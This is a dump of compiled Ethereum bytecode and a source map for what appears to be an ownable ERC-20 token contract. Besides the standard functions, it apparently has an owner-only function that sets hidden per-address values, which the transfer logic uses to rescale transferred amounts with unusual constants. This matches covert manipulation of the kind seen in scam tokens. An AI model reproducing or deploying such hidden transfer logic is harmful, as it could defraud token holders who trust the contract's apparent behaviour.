ffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f80610535610727565b90506105428185856107d2565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105d76108c2565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610647575f6040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040161063e91906111be565b60405180910390fd5b61065081610949565b50565b61065b6108c2565b61066361042e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610699575f80fd5b5f5b8282905081101561072157835f808585858181106106bc576106bb611330565b5b90506020020160208101906106d19190611184565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080806107199061138a565b91505061069b565b50505050565b5f33905090565b61073b8383836001610a0c565b505050565b5f61074b848461054d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146107cc57818110156107bd578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016107b4939291906113d1565b60405180910390fd5b6107cb84848484035f610a0c565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610842575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161083991906111be565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108b2575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108a991906111be565b60405180910390fd5b6108bd838383610bdb565b505050565b6108ca610727565b73ffffffffffffffffffffffffffffffffffffffff166108e861042e565b73ffffffffffffffffffffffffffffffffffffffff16146109475761090b610727565b6040517f118cdaa700000000000000000000000000000000000000000000000000000000815260040161093e91906111be565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610a7c575f6040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610a7391906111be565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aec575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610ae391906111be565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610bd5578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610bcc91906110e7565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c2b578060035f828254610c1f9190611406565b92505081905550610cfb565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610cb5578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610cac939291906113d1565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d42578060035f8282540392505081905550610e37565b60c95f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20545f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dc89190611406565b10610dec5762b4f1d561a1f982610ddf9190611439565b610de991906114a7565b90505b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60a15f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610ebe5760c95f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610f1b91906110e7565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610f5f578082015181840152602081019050610f44565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610f8482610f28565b610f8e8185610f32565b9350610f9e818560208601610f42565b610fa781610f6a565b840191505092915050565b5f6020820190508181035f830152610fca8184610f7a565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61100382610fda565b9050919050565b61101381610ff9565b811461101d575f80fd5b50565b5f8135905061102e8161100a565b92915050565b5f819050919050565b61104681611034565b8114611050575f80fd5b50565b5f813590506110618161103d565b92915050565b5f806040838503121561107d5761107c610fd2565b5b5f61108a85828601611020565b925050602061109b85828601611053565b9150509250929050565b5f8115159050919050565b6110b9816110a5565b82525050565b5f6020820190506110d25f8301846110b0565b92915050565b6110e181611034565b82525050565b5f6020820190506110fa5f8301846110d8565b92915050565b5f805f6060848603121561111757611116610fd2565b5b5f61112486828701611020565b935050602061113586828701611020565b925050604061114686828701611053565b9150509250925092565b5f60ff82169050919050565b61116581611150565b82525050565b5f60208201905061117e5f83018461115c565b92915050565b5f6020828403121561119957611198610fd2565b5b5f6111a684828501611020565b91505092915050565b6111b881610ff9565b82525050565b5f6020820190506111d15f8301846111af565b92915050565b5f80604083850312156111ed576111ec610fd2565b5b5f6111fa85828601611020565b925050602061120b85828601611020565b9150509250929050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261123657611235611215565b5b8235905067ffffffffffffffff81111561125357611252611219565b5b60208301915083602082028301111561126f5761126e61121d565b5b9250929050565b5f805f6040848603121561128d5761128c610fd2565b5b5f61129a86828701611053565b935050602084013567ffffffffffffffff8111156112bb576112ba610fd6565b5b6112c786828701611221565b92509250509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061131757607f821691505b60208210810361132a576113296112d3565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61139482611034565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036113c6576113c561135d565b5b600182019050919050565b5f6060820190506113e45f8301866111af565b6113f160208301856110d8565b6113fe60408301846110d8565b949350505050565b5f61141082611034565b915061141b83611034565b92508282019050808211156114335761143261135d565b5b92915050565b5f61144382611034565b915061144e83611034565b925082820261145c81611034565b915082820484148315176114735761147261135d565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6114b182611034565b91506114bc83611034565b9250826114cc576114cb61147a565b5b82820490509291505056fea2646970667358221220679a6951d13b84feee9edffa11b4346bc967006b18470eb914d14261e9d7afa364736f6c63430008140033
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106100e8575f3560e01c80638da5cb5b1161008a578063a9059cbb11610064578063a9059cbb1461024c578063dd62ed3e1461027c578063f2fde38b146102ac578063f4958bf2146102c8576100e8565b80638da5cb5b146101e057806395d89b41146101fe578063a2f55ae51461021c576100e8565b806323b872dd116100c657806323b872dd14610158578063313ce5671461018857806370a08231146101a6578063715018a6146101d6576100e8565b806306fdde03146100ec578063095ea7b31461010a57806318160ddd1461013a575b5f80fd5b6100f46102e4565b6040516101019190610fb2565b60405180910390f35b610124600480360381019061011f9190611067565b610374565b60405161013191906110bf565b60405180910390f35b610142610396565b60405161014f91906110e7565b60405180910390f35b610172600480360381019061016d9190611100565b61039f565b60405161017f91906110bf565b60405180910390f35b6101906103cd565b60405161019d919061116b565b60405180910390f35b6101c060048036038101906101bb9190611184565b6103d5565b6040516101cd91906110e7565b60405180910390f35b6101de61041b565b005b6101e861042e565b6040516101f591906111be565b60405180910390f35b610206610456565b6040516102139190610fb2565b60405180910390f35b61023660048036038101906102319190611184565b6104e6565b60405161024391906110e7565b60405180910390f35b61026660048036038101906102619190611067565b61052b565b60405161027391906110bf565b60405180910390f35b610296600480360381019061029191906111d7565b61054d565b6040516102a391906110e7565b60405180910390f35b6102c660048036038101906102c19190611184565b6105cf565b005b6102e260048036038101906102dd9190611276565b610653565b005b6060600480546102f390611300565b80601f016020809104026020016040519081016040528092919081815260200182805461031f90611300565b801561036a5780601f106103415761010080835404028352916020019161036a565b820191905f5260205f20905b81548152906001019060200180831161034d57829003601f168201915b5050505050905090565b5f8061037e610727565b905061038b81858561072e565b600191505092915050565b5f600354905090565b5f806103a9610727565b90506103b6858285610740565b6103c18585856107d2565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104236108c2565b61042c5f610949565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461046590611300565b80601f016020809104026020016040519081016040528092919081815260200182805461049190611300565b80156104dc5780601f106104b3576101008083540402835291602001916104dc565b820191905f5260205f20905b8154815290600101906020018083116104bf57829003601f168201915b5050505050905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f80610535610727565b90506105428185856107d2565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105d76108c2565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610647575f6040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040161063e91906111be565b60405180910390fd5b61065081610949565b50565b61065b6108c2565b61066361042e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610699575f80fd5b5f5b8282905081101561072157835f808585858181106106bc576106bb611330565b5b90506020020160208101906106d19190611184565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080806107199061138a565b91505061069b565b50505050565b5f33905090565b61073b8383836001610a0c565b505050565b5f61074b848461054d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146107cc57818110156107bd578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016107b4939291906113d1565b60405180910390fd5b6107cb84848484035f610a0c565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610842575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161083991906111be565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108b2575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108a991906111be565b60405180910390fd5b6108bd838383610bdb565b505050565b6108ca610727565b73ffffffffffffffffffffffffffffffffffffffff166108e861042e565b73ffffffffffffffffffffffffffffffffffffffff16146109475761090b610727565b6040517f118cdaa700000000000000000000000000000000000000000000000000000000815260040161093e91906111be565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610a7c575f6040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610a7391906111be565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aec575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610ae391906111be565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610bd5578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610bcc91906110e7565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c2b578060035f828254610c1f9190611406565b92505081905550610cfb565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610cb5578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610cac939291906113d1565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d42578060035f8282540392505081905550610e37565b60c95f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20545f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dc89190611406565b10610dec5762b4f1d561a1f982610ddf9190611439565b610de991906114a7565b90505b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60a15f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610ebe5760c95f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610f1b91906110e7565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610f5f578082015181840152602081019050610f44565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610f8482610f28565b610f8e8185610f32565b9350610f9e818560208601610f42565b610fa781610f6a565b840191505092915050565b5f6020820190508181035f830152610fca8184610f7a565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61100382610fda565b9050919050565b61101381610ff9565b811461101d575f80fd5b50565b5f8135905061102e8161100a565b92915050565b5f819050919050565b61104681611034565b8114611050575f80fd5b50565b5f813590506110618161103d565b92915050565b5f806040838503121561107d5761107c610fd2565b5b5f61108a85828601611020565b925050602061109b85828601611053565b9150509250929050565b5f8115159050919050565b6110b9816110a5565b82525050565b5f6020820190506110d25f8301846110b0565b92915050565b6110e181611034565b82525050565b5f6020820190506110fa5f8301846110d8565b92915050565b5f805f6060848603121561111757611116610fd2565b5b5f61112486828701611020565b935050602061113586828701611020565b925050604061114686828701611053565b9150509250925092565b5f60ff82169050919050565b61116581611150565b82525050565b5f60208201905061117e5f83018461115c565b92915050565b5f6020828403121561119957611198610fd2565b5b5f6111a684828501611020565b91505092915050565b6111b881610ff9565b82525050565b5f6020820190506111d15f8301846111af565b92915050565b5f80604083850312156111ed576111ec610fd2565b5b5f6111fa85828601611020565b925050602061120b85828601611020565b9150509250929050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261123657611235611215565b5b8235905067ffffffffffffffff81111561125357611252611219565b5b60208301915083602082028301111561126f5761126e61121d565b5b9250929050565b5f805f6040848603121561128d5761128c610fd2565b5b5f61129a86828701611053565b935050602084013567ffffffffffffffff8111156112bb576112ba610fd6565b5b6112c786828701611221565b92509250509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061131757607f821691505b60208210810361132a576113296112d3565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61139482611034565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036113c6576113c561135d565b5b600182019050919050565b5f6060820190506113e45f8301866111af565b6113f160208301856110d8565b6113fe60408301846110d8565b949350505050565b5f61141082611034565b915061141b83611034565b92508282019050808211156114335761143261135d565b5b92915050565b5f61144382611034565b915061144e83611034565b925082820261145c81611034565b915082820484148315176114735761147261135d565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6114b182611034565b91506114bc83611034565b9250826114cc576114cb61147a565b5b82820490509291505056fea2646970667358221220679a6951d13b84feee9edffa11b4346bc967006b18470eb914d14261e9d7afa364736f6c63430008140033
Deployed Bytecode Sourcemap
105:537:6:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2092:89:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4311:186;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3162:97;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5057:244;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3020:82;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3317:116;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2286:101:5;;;:::i;:::-;;1631:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2294:93:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;391:112:6;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3628:178:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3864:140;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2536:215:5;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;147:238:6;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2092:89:1;2137:13;2169:5;2162:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2092:89;:::o;4311:186::-;4384:4;4400:13;4416:12;:10;:12::i;:::-;4400:28;;4438:31;4447:5;4454:7;4463:5;4438:8;:31::i;:::-;4486:4;4479:11;;;4311:186;;;;:::o;3162:97::-;3214:7;3240:12;;3233:19;;3162:97;:::o;5057:244::-;5144:4;5160:15;5178:12;:10;:12::i;:::-;5160:30;;5200:37;5216:4;5222:7;5231:5;5200:15;:37::i;:::-;5247:26;5257:4;5263:2;5267:5;5247:9;:26::i;:::-;5290:4;5283:11;;;5057:244;;;;;:::o;3020:82::-;3069:5;3093:2;3086:9;;3020:82;:::o;3317:116::-;3382:7;3408:9;:18;3418:7;3408:18;;;;;;;;;;;;;;;;3401:25;;3317:116;;;:::o;2286:101:5:-;1524:13;:11;:13::i;:::-;2350:30:::1;2377:1;2350:18;:30::i;:::-;2286:101::o:0;1631:85::-;1677:7;1703:6;;;;;;;;;;;1696:13;;1631:85;:::o;2294:93:1:-;2341:13;2373:7;2366:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2294:93;:::o;391:112:6:-;449:7;475:10;:21;486:9;475:21;;;;;;;;;;;;;;;;468:28;;391:112;;;:::o;3628:178:1:-;3697:4;3713:13;3729:12;:10;:12::i;:::-;3713:28;;3751:27;3761:5;3768:2;3772:5;3751:9;:27::i;:::-;3795:4;3788:11;;;3628:178;;;;:::o;3864:140::-;3944:7;3970:11;:18;3982:5;3970:18;;;;;;;;;;;;;;;:27;3989:7;3970:27;;;;;;;;;;;;;;;;3963:34;;3864:140;;;;:::o;2536:215:5:-;1524:13;:11;:13::i;:::-;2640:1:::1;2620:22;;:8;:22;;::::0;2616:91:::1;;2693:1;2665:31;;;;;;;;;;;:::i;:::-;;;;;;;;2616:91;2716:28;2735:8;2716:18;:28::i;:::-;2536:215:::0;:::o;147:238:6:-;1524:13:5;:11;:13::i;:::-;260:7:6::1;:5;:7::i;:::-;246:21;;:10;:21;;;237:32;;;::::0;::::1;;284:9;279:100;303:6;;:13;;299:1;:17;279:100;;;361:7;337:10;:21:::0;348:6:::1;;355:1;348:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;337:21;;;;;;;;;;;;;;;:31;;;;318:3;;;;;:::i;:::-;;;;279:100;;;;147:238:::0;;;:::o;656:96:0:-;709:7;735:10;728:17;;656:96;:::o;9629:128:1:-;9713:37;9722:5;9729:7;9738:5;9745:4;9713:8;:37::i;:::-;9629:128;;;:::o;11303:477::-;11402:24;11429:25;11439:5;11446:7;11429:9;:25::i;:::-;11402:52;;11488:17;11468:16;:37;11464:310;;11544:5;11525:16;:24;11521:130;;;11603:7;11612:16;11630:5;11576:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;11521:130;11692:57;11701:5;11708:7;11736:5;11717:16;:24;11743:5;11692:8;:57::i;:::-;11464:310;11392:388;11303:477;;;:::o;5674:300::-;5773:1;5757:18;;:4;:18;;;5753:86;;5825:1;5798:30;;;;;;;;;;;:::i;:::-;;;;;;;;5753:86;5866:1;5852:16;;:2;:16;;;5848:86;;5920:1;5891:32;;;;;;;;;;;:::i;:::-;;;;;;;;5848:86;5943:24;5951:4;5957:2;5961:5;5943:7;:24::i;:::-;5674:300;;;:::o;1789:162:5:-;1859:12;:10;:12::i;:::-;1848:23;;:7;:5;:7::i;:::-;:23;;;1844:101;;1921:12;:10;:12::i;:::-;1894:40;;;;;;;;;;;:::i;:::-;;;;;;;;1844:101;1789:162::o;2905:187::-;2978:16;2997:6;;;;;;;;;;;2978:25;;3022:8;3013:6;;:17;;;;;;;;;;;;;;;;;;3076:8;3045:40;;3066:8;3045:40;;;;;;;;;;;;2968:124;2905:187;:::o;10589:432:1:-;10718:1;10701:19;;:5;:19;;;10697:89;;10772:1;10743:32;;;;;;;;;;;:::i;:::-;;;;;;;;10697:89;10818:1;10799:21;;:7;:21;;;10795:90;;10871:1;10843:31;;;;;;;;;;;:::i;:::-;;;;;;;;10795:90;10924:5;10894:11;:18;10906:5;10894:18;;;;;;;;;;;;;;;:27;10913:7;10894:27;;;;;;;;;;;;;;;:35;;;;10943:9;10939:76;;;10989:7;10973:31;;10982:5;10973:31;;;10998:5;10973:31;;;;;;:::i;:::-;;;;;;;;10939:76;10589:432;;;;:::o;6289:1389::-;6394:1;6378:18;;:4;:18;;;6374:540;;6530:5;6514:12;;:21;;;;;;;:::i;:::-;;;;;;;;6374:540;;;6566:19;6588:9;:15;6598:4;6588:15;;;;;;;;;;;;;;;;6566:37;;6635:5;6621:11;:19;6617:115;;;6692:4;6698:11;6711:5;6667:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;6617:115;6884:5;6870:11;:19;6852:9;:15;6862:4;6852:15;;;;;;;;;;;;;;;:37;;;;6552:362;6374:540;6942:1;6928:16;;:2;:16;;;6924:595;;7107:5;7091:12;;:21;;;;;;;;;;;6924:595;;;7242:4;7222:10;:16;7233:4;7222:16;;;;;;;;;;;;;;;;7205:10;:14;7216:2;7205:14;;;;;;;;;;;;;;;;:33;;;;:::i;:::-;:41;7201:113;;7291:8;7282:6;7274:5;:14;;;;:::i;:::-;:25;;;;:::i;:::-;7266:33;;7201:113;7489:5;7472:9;:13;7482:2;7472:13;;;;;;;;;;;;;;;;:22;;;;;;;;;;;6924:595;7579:4;7561:10;:14;7572:2;7561:14;;;;;;;;;;;;;;;;:22;7557:74;;7616:4;7599:10;:14;7610:2;7599:14;;;;;;;;;;;;;;;:21;;;;7557:74;7661:2;7646:25;;7655:4;7646:25;;;7665:5;7646:25;;;;;;:::i;:::-;;;;;;;;6289:1389;;;:::o;7:99:7:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:2